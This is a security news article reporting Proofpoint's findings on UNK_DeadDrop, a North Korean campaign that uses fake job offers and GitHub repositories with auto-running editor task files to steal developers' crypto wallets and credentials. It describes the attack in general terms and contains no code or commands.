UNK_DeadDrop: North Korean Hackers Target Developers

by ddos · June 12, 2026

UNK_DeadDrop campaign, North Korean hackers, GitHub malware, developer phishing

North Korean hackers have launched a sweeping new campaign against software developers. The attackers rely on fake job postings and offers to review someone else’s code. According to Proofpoint, they have already targeted employees at nearly one hundred organizations across the financial, technology, education, and cryptocurrency sectors. Researchers track this activity under the name UNK_DeadDrop.

How the Campaign Lures Victims

The operation revolves around popular collaborative development platforms. Potential victims receive emails offering a job or asking them to review an open-source project. These messages contain links to GitHub repositories that appear to be genuine technical assignments, cryptocurrency tools, or AI-related projects.

Once a developer downloads the repository, they are prompted to open it in Visual Studio Code or Cursor. Hidden inside is a special task file capable of automatically launching malicious scripts. Cursor proves especially dangerous in this scenario. While Visual Studio Code normally warns users before running such tasks, Cursor executes them immediately upon opening the project, with no additional prompts.

Different Payloads for Different Operating Systems

From this point, the attack unfolds differently depending on the victim’s operating system. On Linux and macOS, the attackers install a modified version of the open-source tool Overlord, turning the device into a remotely controlled node. Windows users face a different approach altogether. There, the malicious code runs inside the editor’s own components and tries to avoid leaving obvious traces on disk.

The Real Target: Crypto Wallets and Credentials

The attackers’ primary goal is to steal digital assets and login credentials. Their malware harvests cryptocurrency wallet contents, browser extension data, saved passwords, authentication files, and other valuable information. On macOS and Linux, the attackers go a step further by displaying fake system prompts to capture the user’s password. From there, they attempt to gain elevated privileges and extract data from the system’s keychain storage.

Hundreds of Phishing Emails in Six Weeks

Over a six-week period, researchers logged more than 250 phishing emails tied to this campaign. The attackers used the names of real companies alongside fictitious cryptocurrency projects as cover. Common lures included job offers for roles such as Full-Stack Engineer and Agent Lead Developer, along with requests to review code or test smart-contract development tools. More recently, the attackers shifted toward distributing projects related to payment systems for AI agents.

How UNK_DeadDrop Compares to Contagious Interview

In terms of methodology, UNK_DeadDrop resembles the well-known North Korean campaign Contagious Interview, which similarly hunted for developers and cryptocurrency assets. However, Proofpoint researchers point out several key differences. This newer group leans heavily on mass email distribution, operates its own infrastructure, and embeds malicious components directly inside repositories rather than relying on external servers to deliver payloads. You can find Proofpoint’s full technical breakdown of the campaign for further details.

A Growing and More Organized Threat

The report’s authors believe North Korean operations against developers are becoming larger in scale and more organized overall. By shifting from targeted social media contacts toward large-scale email campaigns, the attackers reach far more potential victims. Moreover, by abusing trusted development tools, they sidestep suspicion and bypass many existing security defenses.